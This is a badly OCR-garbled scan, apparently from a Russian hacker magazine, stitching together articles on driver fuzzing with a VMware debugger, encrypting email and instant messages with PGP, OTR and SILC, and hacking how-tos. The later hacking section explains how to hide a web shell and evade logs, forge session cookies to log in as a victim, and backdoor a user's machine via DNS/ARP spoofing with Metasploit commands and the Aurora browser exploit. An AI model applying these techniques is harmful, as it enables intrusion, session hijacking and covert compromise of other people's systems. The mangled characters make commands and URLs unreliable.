рый мы сейчас и создадим. 

1. Сначала создаем именованный канал 
в ѴМѵѵаге. Для этого переходим в меню 
«ВеШпдз -> СопЬдигаЬоп ЕбЬог», нажи- 
маем на кнопку добавить оборудование 
(« АсІ сі »] , выбираем «Вегіаі Рог!», жмем 
«ІЧехІ», далее из списка выбираем тип 
порта — «ІІзе патесі ріре» и оставляем 
дефолтное название для именованного 
канала (\\.\ріре\сот_1 ). После этого зада- 
ем режим работы «ТЬіз епб із зегѵег. ТЬе 
оіЬег епб із арріісаііоп» в двух выпадаю- 
щих полях и напоследок нажимаем кнопку 
«АбѵапсесІ», где активируем опцию «Ѵііеб 
СРИ оп роіі» (иначе ничего не заработает]. 
Осталось реализовать возможность загруз- 
ки гостевой системы с включенным режи- 
мом удаленной отладки. Для этого в ЬооЕ 
іпі (будем считать, что в качестве гостевой 
системы используется ѴѴіпбоѵѵз ХР] необ- 
ходимо вставить новую строку для запуска 
системы, добавив два важных ключа / 
беЬидрогІ: и /Ьаибгаію: 

[орегакіпд зузСешз] 
шиІСі ( 0 ) сіізк ( 0 ) гсіізк ( 0 ) 
рагкікіоп ( 1 ) \ЖШСЖ8= "Місгозоік 
Мпсіоѵѵз ХР Ргоіеззіопаі " / 
іазксіекеск 

шиікі ( 0 ) сіізк ( 0 ) гсіізк ( 0 ) 
рагкікіоп ( 1 ) \ѴШТОСМ8= "Місгозоік 
Шіпсіоѵѵз ХР Ргоіеззіопаі - БеЪид" 
/іазксіекеск /<іеЬидрогк = сот1 / 
Ъаис1гаке=1152 00 

Во время следующей перезагрузки необ- 
ходимо в загрузчике выбрать ту версию 
системы, для которой мы включили режим 




Создаем именованный канал для подключения удаленного отладчика 



отладки. Остается настроить сам отладчик, 
но для этого нужно лишь во время запуска 
передать ему параметры именованного 
канала: 

ѵѵіпсІЪд -Ь -к сот:ріре,рогк = \\ . \ 

ріре\сот_1 , гезекз=0 

Вот теперь можно запускать I ОСТЬ Ринег 
в режиме фаззинга, не опасаясь ВБСЮ'а 
на основной системе. Выполняем про- 
извольные манипуляции с тестируемым 
ПО до тех пор, пока отладчик не сообщит 
нам о возникновении необрабатываемого 
исключения (это значит, что в обычных 
условиях, скорее всего, это закончилось 
бы аварийным завершением работы 
системы]. 

Далее необходимо возобновить выпол- 
нение кода на виртуальной машине (в 
случае с ѴѴіпОЬд надо просто нажать Е5], 
после чего ОС, работающая на виртуальной 
машине, запишет аварийный дамп (сгазЬ 
битр] на диск. Готово: теперь у нас есть 
подробные логи, дамп и сам запрос, кото- 
рый привел к падению. Дело за малым — 
понять, как это можно эксплуатировать :). 

А КАК ЖЕ ВЕБ-ФАЗЗЕРЫ? 

Я намеренно не стал упоминать в рамках 
этой статьи так называемые ѵѵеЬ-Ьазеб 
фаззеры, которые работают на уровне 
НТТР и заваливают веб-сервер спе- 
циально составленными запросами в 
поиске ошибок веб-приложения. Такая 



опция есть в каждом втором сканере 
веб-безопасности, которые мы не так 
давно рассматривали в рамках цикла 
«Инструменты пентестера» (РОЕ-версию 
этой статьи ты найдешь на нашем диске]. 
Если говорить об универсальных плат- 
формах для создания фаззеров, то грех 
не вспомнить о фреймворке Биііеу ( соі 
доодІе.сот/р/зиЦеу ]. представленном на 
ВІаскЬаЕе в 2007 году. К сожалению, с 
тех самых пор он и не развивается, но 
несмотря на это остается эффективным 
решением. 

Каждый отдельный фаззер с его помощью 
конструируется отдельно, но в отличие 
от РеасЬ, где все описывается деклара- 
тивно в ХМЬ-файле, здесь тебе придется 
написать немного кода на РуіЬоп. Есть 
еще один популярный конструктор фаз- 
зеров — проект 5РІКЕ ( ѵѵѵѵѵѵ.іттипііѵзес. 
сот/гезоигсез-ІгеезоІіѵѵаге.зЫтІ ]. но 
подружиться с ним смогут только те, кто 
хорошо знает язык С. Помимо этого можно 
было долго говорить о фаззерах для поис- 
ка уязвимостей в АсГѵеХ, СОМ-объектах 
и где угодно еще. Но это не главное. 

Важно понять, что во многих местах поиск 
уязвимостей можно автоматизировать: 
именно с помощью фаззинга находится 
большое количество багов в современных 
браузерах и смежных с ними продуктов. 

А если есть понимание того, где может 
быть выявлена ошибка и как ее искать, то 
фаззер уже несложно написать самому или 
подобрать готовое решение, т 
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Надежные способы сохранить 
конфиденциальность переписки 



Дамп интернет-трафика, как правило, довольно однообразен: пароли и данные 
форм, которые по-прежнему повсеместно передаются без НТТРЗ, е-мейлы и пе- 
реписка из различных ІМ-мессенжеров. Последнего - особенно много. А теперь 
посмотри на свои открытые окна в мессенжере и подумай: хотел ли ты, чтобы 
твои мессаги сейчас кто-то читал? Задумавшись на этот счет, я решил не играть 
с судьбой и немного заморочился по части шифрования приватных разговоров. 



ШИФРУЕМ ПОНТУ В ОМАН 

Когда я забирал почту с многочисленных 
почтовых ящиков с помощью ТЬе Ват!, отправ- 
лять письма в зашифрованном виде было 
проще простого. Давно зарекомендовавшую 
себя систему шифрования РВР было легко под- 
ключить к любому популярному почтовику и при 
этом вполне удобно использовать. Со временем 
я, как и многие другие, перешел на Отаіі и 
стал использовать веб-интерфейс, а поддержки 
шифрования сообщений в нем как не было, 



так и даже не анонсировано. Хотя нельзя ска- 
зать, что Соодіе не заботится о безопасности: 
гуглопочта для авторизации давно использует 
исключительно НТТРЗ и даже, больше того, 
позволяет постоянно работать по защищенно- 
му соединению. Проверь, чтобы в настройках 
опция «Вгоѵѵзег соппесбоп» была выставлена 
как«А1\л/ауз изе ЫТрз». Таким образом, можно 
не волноваться, что твои письма отснифа- 
ют в каком-нибудь кафе или другом месте с 
открытым ѴѴі-Рі, но чтобы скрыть содержание 



письма от самого Стаіі и всех других серверов, 
придется использовать дополнительное шиф- 
рование — например, с помощью Р0Р/6РВ. 
Если говорить о веб-интерфейсе, то подклю- 
чить его можно только в Рігебох’е, для которого 
уже довольно давно разрабатывается плагин 
РігебРб [ ги.деіТгедрд.огд/з/іпзІюи ). Напомню, 
что смысл шифрования Р6Р в существовании 
пары ключей: закрытого (ргіѵаЫ и открытого 
(риЫіс), а также специальной процедуры, кото- 
рая может с помощью открытого ключа преоб- 
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разовать сообщение так, чтобы обратное пре- 
образование было возможно только с помощью 
закрытого ключа. Получается, ты можешь под- 
писывать сообщения своим открытым ключом и 
использовать открытый ключ другого человека 
для того, чтобы отправить ему зашифрованное 
сообщение, и наоборот. Это основной принцип 
ассиметричного шифрования. В сам плагин 
РігеРОР никакие криптографические функ- 
ции не включены, это лишь прослойка между 
веб-интерфейсом Отаіі и программой для 
шифрования ОпиРО, которую предварительно 
необходимо установить. Есть разные вариации, 
в зависимости от ОС: 

• для ѴѴіпбоѵѵз: дрд4ѵѵіп ( ѵѵѵѵѵѵ.дрдДѵѵіп.огд/ 
сІоѵѵпІоасІ.ЫтІ ): 

• Ыпих'е: бпиРб [ ѵѵѵѵѵѵ.дпирд.огд/боѵѵпіоаб/ 
іпбех.еп.ЫтІ ): 

• МасОЭ: Мае 6Р6 ( тасдрд.зоигсеіогде.пеі ]. 

Далее, подключив к браузеру и сам плагин, 
Рігебох предложит указать настройки. Самое 
главное — сгенерировать закрытый и откры- 
тый ключи, указав несколько параметров, в 
том числе пароль, срок действия ключа, его 
длину. Важная опция «Включить поддержку 
Отаіі» свяжет РігеРСР с Отаіі, и она включе- 
на по умолчанию. Теперь при создании нового 
письма в интерфейсе Отаіі у тебя появятся 
кнопки «Зашифровать» и «Прикрепить зашиф- 
рованный файл». Понятно, что для чтения 
зашифрованных писем адресату точно также 
потребуется Р0Р/0Р0 и твой открытый ключ. 
При этом это совершенно необязательно дол- 
жен быть Отаіі — эта система шифрования, 
как я уже говорил, отлично прикручивается к 
любому почтовому клиенту. Да и Отаіі — это не 
только веб-почта, с аккаунтом можно отлично 
работать по протоколам Р0Р/ІМАР/5МТР. 



БЕЗОПАСНОЕ ОБЩЕНИЕ В АСЬКЕ 

С почтой, вообще говоря, все понятно: 
есть РОР, к которому давно все привыкли, 

— его и используем. А вот с многообрази- 
ем мессенжеров, которых с шифрованием 
сообщений обделили никак не меньше, 
далеко не все так гладко. Из популярных в 
России протоколов шифрование изначально 
предусматривалось только в баЬЬег'е (об 
этом ниже]. Но как быть с самой популярной 
сетью — I СО? Единственное, что было пере- 
работано в протоколе — это соединение с 
сервером, которое, ура, можно проводить 
через 55І_. Но, черт его знает, что там на 
сервере? Нужно шифровать сообщение, и 
эту функцию придется каким-то образом 
реализовывать поверх протокола. Один из 
подходов — перехватывать все сообще- 
ния и шифровать трафик на лету. Допустим, 
пустить весь трафик мессенжера через 
промежуточный 50СК5-сервер, который 
будет шифровать каждое сообщение и уже в 
безопасном виде отправлять его на сервер. 
Тело сообщения при этом дойдет в таком 
виде до самого адресата и только там пре- 
образуется в открытый вид точно таким же 
50СК5-сервером. Удобно, что не надо никак 
привязываться к мессенжеру (ведь каждый 
из нас любит что-то свое: тігапба, цір, рібдіп 
и т.д.) — системе абсолютно пофигу на него. 
Важно только, чтобы у каждого клиента был 
установлен и настроен такой шифрующий 
50СК5-сервер. Описанный подход в част- 
ности реализовали французские программи- 
сты, выпустившие серию продуктов 5ітрІ_іІе 
( ѵѵѵѵѵѵ.зесѵѵаѵ.іт ]. Увы, проект последние годы 
не обновляется, и если раньше он работал 
более-менее сносно, то сейчас заставить его 



корректно функционировать довольно слож- 
но. Зато семимильными шагами развивается 
даже не конкретное программного решение, 
а именно протокол для безопасной пере- 
дачи сообщений, который может работать 
поверх любого незащищенного соединения, 
в том числе I СО. ОТП или ОІМНе-ПесогсІ 
Меззадіпд — это хитрая комбинация сим- 
метричного шифрования с помощью АЕ5, 
известного алгоритма Диффи-Хеллмана для 
обмена ключей и хеш-функции 5НА-1. Все 
вместе это позволяет надежно защищать 
ІМ-сессии с обязательным шифрованием 
сообщений, аутентификацией собеседника 
и проверкой целостности сообщения. Перед 
тем же РОР у протокола есть важное преиму- 
щество. Даже если твой приватный ключ 
попадет в чужие руки, то предыдущая пере- 
писка не будет скомпрометирована: злоу- 
мышленник просто не сможет ее прочитать. 
Привычные публичный и приватный ключи 
используются только для первичной аутен- 
тификации пользователей, но все дальней- 
шие сообщения шифруются уже с помощью 
одноразовых АЕ5-ключей — так называемых 
Меззаде Аиібепіісаііоп Собез (МАСз). Но не 
будем вдаваться в математику (ссылки на 
подробное описание протокола ты найдешь 
в сносках], а посмотрим, как это работает на 
практике. 

На официальном сайте протокола 
сѵрбегрипкз.са/оіг доступна так назы- 
ваемая ОТР ІосаІЬозІ АІМ ргоху — реа- 
лизация того самого посредника между 
ІМ-клиентом и сервером, о котором мы 
говорили выше. Программа (есть версии 
для винды, линукса и тасоз] работает 
в системе, как самая обычная прокси, 
через которую нужно пустить трафик твое- 
го ІМ-мессенжера (неважно какого]. Для 
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этого в настройках соединения пропиши 
50СК55 (127.0.0.1:1080) или НТТР-прокси 
(127.0.0.1:8080). Во время следующего 
соединения программа подключится к 
100-серверу через ОТР, а в окно Ргоху ты 
увидишь новое подключение. Для каждого 
100-аккаунта необходимо сгенерировать 
ключи, но делать это самому в принципе 
необязательно — программа сделает это 
автоматически. Если собеседник захочет 
установить безопасное подключение, то 
должен будет предоставить свой публичный 
ключ (в ОТР он называется Гіпдегргіпі:) — 
прокси об этом тебя предупредит и добавит 
связку иіп-бпдегргіпі в свою базу данных. 
Далее бпдегргіпі: будет использоваться для 
того, чтобы установить, что собеседник — 
именно тот, за кого себя выдает. Обмен клю- 
чами производится автоматически, и тебе, 
по сути, вообще ничего не надо настраи- 
вать. Если оба клиента подключаются к ІСО- 
серверу через ОТР, то программа по умол- 
чанию установит безопасное соединение. 

С помощью настроек ты можешь отключить 
автоматическое инициирование безопасно- 
го подключения или, напротив, указать, что 
с некоторыми из контактов обмен сообще- 
ниями должен происходить с обязатель- 
ным шифрованием. По своему опыту могу 
сказать, что система не только работает, 
но и работает очень здорово. Можно даже 
попробовать отснифать трафик и убедиться, 
что сообщения передаются исключительно 
в закриптованном виде. 



Другой способ использовать ОТР — при- 
крутить к мессенжеру специальный плагин. 
Для Рібдіп'а есть официальный аддон, к 
Мігапба и диШМ соответствующее допол- 
нение разрабатывается энтузиастами, а в 
известном Мас'овском ІМ-клиенте Абіит 
поддержка протокола есть по умолчанию. 
Если говорить об альтернативах ОТР в 
принципе, то для Мігапба есть плагин 
ЗесигеІМ, который защищает сообщения 
либо встроенным в плагин алгоритмом АЕ5- 
192, либо внешней программой 0Р0/Р0Р. К 
слову, для использования в Мігапба 0Р0/ 
РОР есть и другие плагины — например, 
бпиРб Ріидіп ( аббопз.тігапба-іт.огд/беіаііз. 
рбр?асбоп^ѵіеѵѵЕ[е&іб=3485 ). Но тут надо 
обязательно иметь в виду, что все участники 
разговора в этом случае должны использо- 
вать одно и то же решение. 

ДВВЕР&РВР 

Вместо того чтобы прикручивать шифрование 
там, где его никогда не было, есть другой 
вариант — перейти на протокол, который 
изначально предусматривает безопасную 
передачу сообщений. Что неудивительно, 
таким протоком является ХМРР (Ча ЬЬег) . 
Начнем с того, что практически любой ХМРР- 
сервер сейчас поддерживает защищенное 
55Е/ТЕ5-соединение между сервером и кли- 
ентом, что уже обламывает любителей посни- 
фать трафик в локалке или хотспоте. Более 
того, во многих клиентах предусмотрена воз- 
можность шифровать сообщения между поль- 
зователями, прежде всего, на основе РОР/ 
ОР0. Тут опять же нас выручает свободная 
реализация системы Р0Р — 0пиР0, на кото- 
рую и возложены все функции шифрования. 
Попробуем прикрутить ее к одному из самых 
популярных ХМРР-клиентов — рзі ( ѵѵѵѵѵѵ.рзі- 
іпп.огд ). 0 тем же успехом можно наладить 
связку 0пиР0 с Рібдіп и многими другими 
мессенжерами. 

Если ты уже использовал 0пиР0 вместе с 
плагином Р і ге 0 Р 0 , то у тебя уже наверняка 
есть пара из открытого и закрытого ключей, 
которую ты можешь использовать и для пере- 
писки в ЗаЬЬег'е. В противном случае ключи 
необходимо создать с помощью команды 
«дрд --деп-кеу». В диалоговом режиме надо 
ответить на ряд сопутствующих вопросов, 
указав тип шифрования, длину ключа (чем 



Без кіюча ОТВ-сообщение прочи- 
тать невозможно 

больше — тем лучше), срок его действия, 
идентификатор пользователя, е-таіі, а также 
пароль. Когда ключи будут готовы, необхо- 
димо экспортировать открытый ключ в файл 
и дальше передать его своему собеседнику. 
Для этого выполни команду «дрд --ІізРкеуз» 
— она выведет список доступных ключей и 
их идентификаторы. А дальше, используя 
нужный идентификатор, экспортируй ключ 
в файл: «дрд --агтог --ехрогі: Ю_КЛЮЧА > 
тукеу_дрд.азс». Файл тукеу_дрд.азс будет 
похож на что-то вроде: 

риЪ 1024Б/29Б59819 06.06.2010 
туассоипк ' з кеу (туассоипк ' з кеу) 
<туассоипк@Стаі1 . сот> 

Ргітагу кеу Ііпдегргіпк : 

586С ОРАВ ЭРОС 0009 40С6 273Е 
8885 6А80 29Б5 9819 

ВЕСШ РСР РІІВЫС КЕУ ВЬОСК- 



Ѵегзіоп: СпиРС ѵі . 4 . 9 (МіпдШ2) - 
Ѵ7іпРТ 1.4.3 
Скагзек: ІЛТ-8 

тОС і ВЕыШі теКВАСТ 9 рН 1 У ВБС 5 1 схѵ/з ШиО 
5ВЕ7хКВ2/ЫзсІ05д7з +ВаѴІ0РоХЬко 
[вырезано] 

В1сесіОККЕздпКбЬРкІМАп2ВВхіВТ2Ь.РѵЕп 
АЕдНОрІѴйгавахО 
= 1720 

ЕШ РСР РБВЫС КЕУ ВЬОСК 

Его-то и нужно передать всем адресатам, 
с которыми ты планируешь ввести при- 
ватные беседы. Чтобы не геморроиться 
с консольными утилитами для работы с 
ключами, есть замечательная 0111-тулза 
ѴѴіпРТ ( ѵѵіпрЕапирЕсІе ). которая позволяет 
сделать все то же самое только в 10 раз 
проще. Но что делать со своим закры- 
тым ключом? Ничего. Рзі на запуске сама 
проверяет ключи, которые были созданы 
0пиР0 (заметь, без каких-либо плагинов и 
шаманств с настройками). Надо лишь зайти 
в настройки аккаунта, перейти на вкладку 
«Подробности» и в настройках ОрепР0Р 
выбрать нужный приватный ключ. 0 этого 
момента во время подключения к серверу 
клиент будет запрашивать у тебя пароль 
для этого ключа. А всем тем, кто импорти- 
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ровал твой открытый ключ, клиент будет отображать, 
что твой статус подписан — к сети подключился дей- 
ствительно ты, а не кто-то другой. Осталось уже со 
своей стороны импортировать открытые ключи других 
пользователей и связать их с нужными контактами в 
Рзі, нажав правой кнопкой мыши и выбрав «Присвоить 
ключ ОрепРОР». Ключи проще всего импортиро- 
вать в ѴѴіпРК через меню «Ключ -> Импортировать». 
Единственное надо иметь в виду, что Рзі считывает 
информацию о ключах во время запуска, поэтому после 
любого импорта ключей, его необходимо перезапустить. 
Все, теперь, когда ты откроешь новое окно с чатом, 
то увидишь иконку с замочком. После нажатия на нее 
произойдет сверка ключей, и система выдаст сообще- 
ние о том, что разговор зашифрован. 

БЕЗОПАСНАЯ КОНФЕРЕНЦИЯ 

Еще один нетронутый аспект — организация площад- 
ки для безопасного общения нескольких людей или 
даже большой команды. С этой целью уже давно раз- 




Удобная утилита для управления РСР/СРС-ключами 



рабатывается профильное решение — 51 Ю Зесиге 
I пЕегпеІ: Ыѵе Сопіюгепсіпд ( зіІспеЕогд ). 5ИС очень похож 
в использовании на ІВС: тут тоже есть имена пользо- 
вателей, общие каналы, частные сообщения. Более 
того, совпадают даже основные команды — словом, 
все, как в те времена, когда мы все еще зависали на 
ІРС. Основное различие от ІРС — изначально зало- 
женная защита передаваемой информации. Причем 
шифрование — это базовая часть протокола, ее никак 
нельзя отключить. Шифруются абсолютно все: сообще- 
ния в привате или на канале, пароли, команды и уве- 
домления. 51 ШС появился на десять лет позже ІВС, и у 
разработчиков (прежде всего, Пеки Риконнена] была 
возможность поучиться на чужих ошибках и учесть 
неудачные решения. Так, протокол обеспечивает защи- 
щенную передачу и аутентификацию между клиентом 
и сервером, сервером и сервером, и между клиентами 
в приватной беседе. К тому же, он банально удобен. 
Например, в клиенте по умолчанию поддерживается 
функция беІасЫпд: ты можешь отсоединиться от серве- 
ра, но у других создается иллюзия присутствия. В ІВС 
для этого понадобилось на каком-нибудь сервере уста- 
новить небезызвестный ВІЧС :]. 

Система 5ИС состоит из сервера под никсы, который 
придется установить в безопасном месте, и официального 
клиента для Ыпих/ІІпіх/Мас/ѴѴіпбоѵѵз. Для подключения 
также можно использовать Рібдіп с установленным пла- 
гином. Сервер легко собирается из исходников (стан- 
дартными командами ./сопіідиге&таке&таке іпзіаіі) или 
же инсталлится из грт-пакета (грт -і зііс-зегѵег-і .1 -0. 
бс8.і386.грт). А вот, что придется сделать, так это сгене- 
рировать для каждого пользователя ключ, что делается 
довольно мудреной командой: 

зііссі -С /еСс/зіІсс! 

--ісіепЦіПіег= "1Ж=<изегпате> , НН=<ЬозЦпате 

ог ІР>, ІШ=<геа1 пате>, Е=<етаі1>, 

0=<огдапІ2аСіоп> , С=<соипЦгу>" 

После того, как создашь пользователей, можно запустить 
сервер и попробовать подключиться к нему Рібдіп'ом, 
создав новый профиль для работы через протокол 5ИС. 
Помимо обычных параметров, вроде имени и пароля, 

ІР и порта сервера, необходимо указать расположение 
публичного и закрытого ключей. Ключа у тебя нет, но он 
будет автоматически сгенерирован при первом соедине- 
нии с сервером. Пробуем подсоединиться... Вуаля, теперь 
у нас снова есть удобный ІРС, но гораздо более безопас- 
ный и удобный, т 




НТТР://ѴѴѴШ 



■ г 

> Ііпкз 

Презентация с 
описанием протокола 
ОТР: 

ѵѵѵѵѵѵ.сѵрЬегрипкз.са/ 

оІх/оІг-сосІесоп.рсИ 1 




> ѵѵагпіпд 

Слабое место любого 
мессенжера — исто- 
рия переписки. Она 
не шифруется и, как 
правило, хранится 
в открытом виде. 
Поэтому ее лучше 
отключить. 
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ЗАДАЧА: СКРЫТЬ ПРИСУТСТВИЕ ШЕЛ- 
ЛА НА ВЕБ-СЕРВЕРЕ 



РЕШЕНИЕ: 

На недавно прошедшем Наск ІпТЬе Вох 2010 ОиЬаі крутой спец в области ИБ, 
БаигепІ ОисЫ, представил интересную презентацию натему повышения скрытности 
при взломе через ѵѵеЬ. Материалы можешь найти тут — сопіегепсе.ЫіЬ.ога/ 
ЫіЬ5ессопі2010сІхЬ/таІегіа[5 . Ничего чрезвычайно нового и революционного 
он вроде не рассказал, но приятно обобщил информацию с кучкой подробностей и 
хитростей, которыетеперь можно опробовать на практике. Такчто, еслиты фанатик 
ѵѵеЬ-Иаск'а, то обязательно посмотри ее. Но, сучетом общего интереса кэтойтема- 
тике, я позволю себе обобщить и выделить основные вкусности. 

Для начала рассмотрим проведение самой атаки и исследование скриптов на 
уязвимости. Конечно, самое скрытное — это узнать максимальную информацию о 
жертве (заюзав всевидящий Гугл, например], сконфигуритьаналогичный серваки 
отработать взлом на нем. Минимизировать при этом возможные появления в логах 
и, если что, знать, где подчистить. В итоге должна получиться почти 100% атака с 
минимумом лишних действий. Но чаще всего бываетленьэто все делать, поэтому 
можно, например, скрыть реальный вектор атаки в куче ложных атак. А главное, что- 



бы быть менее заметным в логах, все атаки выполняй методом Р05Т (если, конечно, 
ситуация позволяет], таккаконтам отмечается лишь какобращение кстранице.без 
указания параметров, какэто происходите ВЕТ-запросом. То есть наши попытки 
проинжектить какую-нибудь БД будут не стольуспешны :]. 

Далее, какспрятать«общение» с шеллом. Во-первых, добавить бытовой ин- 
формации, то есть в запросах указывать нормальные значения для ІІзег-АдепІ 
и Ре^егег, чтобы смешаться с другими записями в логах. Кстати, их, наряду с 
проксями, желательно систематически менять, чтобы затруднить прослеживание 
последовательности наших действий. Во-вторых, для передачи команд шеллу и 
получению ответов от него можно юзать куки, например. Тогда твои обращения 
к шеллу будут вы гл я деть как ВЕТ-запросы к странице без параметров, раскры- 
вающих его, то есть совсем без палева. В-третьих, кодируем команды и ответы в 
Ьазе64, например, или что-нибудь позлее, чтобы незасекли в моментобмена дан- 
ными, но это в основном при условии использования на сервере какой-нибудь Ю5. 
В-четвертых, прячем шелл в самых глубоких местах, о коих не раз было рассказано 
в этой рубрике, не забывая обфускировать его разными методами, дабы спрятать- 
ся отантивиреподобногоПО. Ктомуже желательно спрятать несколько шеллов, 
причем разных, чтобы и по массовому обращению к одному скрипту незасекли, да 
и вообще, хорошо это. В общем, отличная основа, чтобы переписать какой-нибудь 
классический ѵѵеЬ-шелл. 




ЗАДАЧА: «ВЖИВУЮ» ПРОАНАЛИЗИРО- 
ВАТЬ РСАР-ТРАФИ К 



РЕШЕНИЕ: 

Есть целая группа программ, которая работаетс«живыми» данными, то есть 
с потоком данных, приходящим на какой-то сетевой интерфейс. Например, 
всевозможные снифферы паролей, детекторы ОС, сервисов, определители 
структуры сети и т.д. Многие из них позволяют подгружать данные из файла 
лога трафика — рсар, но не все. Какраз втакихслучаях нам поможет Ісргеріау. 
Эта программа (точнее, набор программ] читает рсар-файл и прогоняетего 
на сетевом интерфейсе, меняя какие-то значения в пакетах данных, если это 
необходимо. Взять ее можно с ^сргерІаѵ.зѵпГп.пеДѵѵікі/РоѵѵпІоасІ . но обычно 
она уже есть в *піх-системах. Для ѴѴіп есть только кривенький релиз, который 
можно взять там же. 

Приведу простенький пример. Предположим, мы имеем файл іезГрсар с 
трафиком из какой-то подсети, и нужно определить ее структуру: 



Іапшар -і еЫіО 

Запускаем Іаптар на интерфейсе еіЬО. Эта тулза анализируеттрафик прослу- 
шиваемой сети и рисуетее структуру в файл Іаптар. рпд. Не самая лучшая, но 
все же входит в состав ВаскТгаск. Далее запускаем Ісргеріау для «повтора» 
пакетов из рсар-файла на том же интерфейсе. 

Дсргеріау --іпДб1=еЫіО ДезД.рсар 

В итоге мы получим структуру подсети из рсар-файла. Только проследи, чтобы 
на еіЬО не приходило никаких данных из реально подключенной сети, чтобы 
не исказить результат. Хотя легче зареплеить на Іо. Нуда ладно. 

Кроме всего прочего, есть возможности изменения данных рсар-файла. 
Например, можно изменить ІР и МАС-адреса, заголовки пакетов, эмулировать 
клиент-серверное общение. Можно разогнать потокданных... 

Область применения данного ПО конкретно велика, такчто о нем при необхо- 
димости стоит вспоминать. 




ЗАДАЧА: СОЗДАТЬ ПОДДЕЛЬНЫЕ 
СООКІЕ НА ОСНОВЕ СТАТИСТИЧЕСКИХ 
ДАННЫХ 



РЕШЕНИЕ: 

Общеизвестно, что для идентификации пользователей веб-сервером очень 
часто используются куки, поэтому украсть их — благое дело. Пихнув эти куки в 
наш браузер, мы автоматически аутентифицируемся под нашей жертвой. Но 
иногда этого не хватает, так как в кукисах можетхраниться какая-нибудь допол^ 
нительная переменная, привязанная ко времени (или еще как-то]. Ктомуже, 



красть куки не всегда обязательно. Можно их полностью подделать, определив 
алгоритм формирования переменных и подставив нужные нам значения. В об- 
щем, мы заходим несколько раз на атакуемый сервер и смотрим генерируемые 
куки. Статические, временные поля будут сразу заметны. С динамическимиже 
всечуть сложнее, но не намного. Для понимания их работы нам поможетнабор 
скриптов с ореп-ІаЬз.огд/оЬ-зеззіопОАіаг.дг (прилагается на диске]. 

Итак, запускаем: 

регі деДсоокіе.рІ кЦЦр : //ехашріе . сот ИЗЕКІБ 100 > ДезШ.ДхД 
Где деіеоокіе.рі — скрипт для получения значений из переменной в кукисах; 
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Ыір://ехатрІе.сот — полный путь до страницы на 
атакуемом веб-сервере; ІІ5ЕРІВ — имя переменной 
в кукисах, откуда берем значения и файл Іезіі .1x1, 
куда сохраняем их; 1 00 — количество запросов к 
серверу для формирования необходимой базы и 
определения зависимостей. 

Далее запускаем скрипт для анализа полученных 
данных: 

регі оЬ-зеззіоп.рІ < ДезДІ . ДхЦ 

В итоге мы получаем статистические данные об 
изменяемых и постоянных позициях, наборе симво- 
лов, возможности перебора и т.д. 

На основе этих данных, используя какой-либо 
іинег, мы сможем методом тыка подобрать необ- 
ходимые значения для кукисов и таким образом 
аутентифицироваться на сервере. 

Кстати, оЬ-зеззіоп.рІ работаете простыми тексто- 
выми строками, так что можно использовать этот 
скрипт и для анализа других последовательностей. 



Анализ переменной от РНР-сессии и пользова- 
тельской (динамической] 
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ЗАДАЧА: ЗАБЭКДОРИТЬ КЛИЕНТСКУЮ 
МАШИНУ 



РЕШЕНИЕ: 

Здесь под «клиентской машиной» понимается комп обычного юзера. То есть 
какая-нибудь версия ѴѴіпбоѵѵз, файервольчик, возможно антивирь — никаких 
лишнихсервисов наружу не торчит, а единственные программы, которыми поль- 
зуется юзер — это браузер, да, может быть, почтовый клиент. Но все решаемо. 
Воспользуемся функционалом МеІазрІоіЕа. 

Первая трудность — достать пользователя. В данной ситуации, если 
мы находимся «далеко» от пользователя, то мы можем либо с помощью 
социальной инженерии, либо благодаря уязвимостям сайтов, которые 
пользователь посещает, заставить зайти его на наш «специально оформ- 
ленный» сайт. Если же мы находимся в одной сети с ним, то проблема 
решается проще, ведь мы можем заставить его зайти на наш сервер. В этом 
нам поможет б пз-зрооГіпд. Суть заключается в подделке ответов ВІ\І5-сер- 
вера. Иными словами, браузер нашей жертвы при путешествиях по сайтам 
делаетзапросы к ВІ\І5-серверу, чтобы перевести названия посещаемых 
сайтов в ІР-адреса. Мы же перехватываем их и отвечаем с подмененным 
ІР-адресом нашего сервера. 

В зависимости отситуации может потребоваться применение агр-зрообпд, 
чтобы перенаправить трафик через нас, чтобы мы могли «видеть» ВІ\І5-запросы. 
Я писал про агр-зрообпд в прошлом номере, потому не буду подробно останав- 
ливаться на описании. 



Далее ВІМЗ-зрообпд. В МеІазрІоіЕе есть модуль Іа ке бпз, как раз для этих целей, 
но я воспользуюсь модулем отВідіпіща, который скачать можно здесь: бщіщіщш 
огд/теіазріоіі/бпз ббер.рбр (либо с диска). Главное отличие последнего втом, 
что поддельные ответы он посылаеттолько для имен, хранящихся в файле бпз. 
Іхі, остальные пересылаются на реальный ВИЗ. Это позволяет избавиться от 
некоторых «глюков» и сконцентрировать атаку. 

Устанавливаем модуль: 

1 . Качаем и разархивируем 

2 . Папку (іпз_ші1:ш кидаем в аихіііагу/зегѵег в шеДазрІоіІ: ' е 

Папка ІіЬ из архива нужна для модуля бЬср_ехЬаизІіоп, то есть нам не нужна. 
Заходим в тзіеопзоіе. 

изе аихі1іагу/зегѵег/йпз_тіСт/с1пз_тіЦт 

зеД КІЬЕЫАМЕ /тзІЗ /тойиіез/аихіііагу/зегѵег/сіпз . ЦхЦ 

зеД КЕАЦБЫЗ 192.168.0.1 

гип 

Здесь мы подгрузили модуль, указали необходимые переменные среды: путь до 
файла бпг.іхі и ІР настоящего ВІ\І5-сервера и запустили его. 

Кстати, путь под ѴѴіпбоѵѵз нужно указывать не полный, а относительно папки 
с МеІазроіСом,таккакМ5Е исполняется в Судѵѵіп’е. Иначе говоря, нельзя 
кинуть файлик на диск С и прописать путь к нему. 

Файл бпз.іхісодержитзаписи вида: 



агрзрооі -і еЕЬО 192.168.0.1, 



192 .168.0.1 доодіе . ги 



где 192.168.0.1 — ІР шлюза, чей МАО мы подменяем своим. 

есЬ.о «1» > /ргос/зуз/пеЕ/ірѵ4/ір_1огтгс1 
Форвардингвсего приходящего трафика. 



где 192.168.0.1 — ІР нашего сайта с начинкой, а доодіе. сот — сайт, куда юзер 
попытается зайти, но попадет к нам. Список можно пополнять во время действия 
модуля, подгружая по мере необходимости. Делается это за счет отправки 
специального ВІ\І5-запроса на наш фейковый сервер. Можно локально, пишем 

в КОНСОЛИ: 
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ш 






Еагу 


Еагу 


Еазу 


Наск 


Наск 


Наск 



пзіоокир сіідіпіпза.геіоасі 192.168.0.101 

где 192.168.0.101 — ІР поддельного РИЗ, сіідіпіпіа.геіоасі — «указание» обновить 
сІпз.ГхГ (можно поменять в переменной РЕШАй в МЭР]. 

Далее. Создаем сайт с начинкой. Эксплойт подбираем под браузер 
жертвы. Начинка — теГегргеГег. Тема заезжена, потому кратко. Юзаем 
Аврору. 

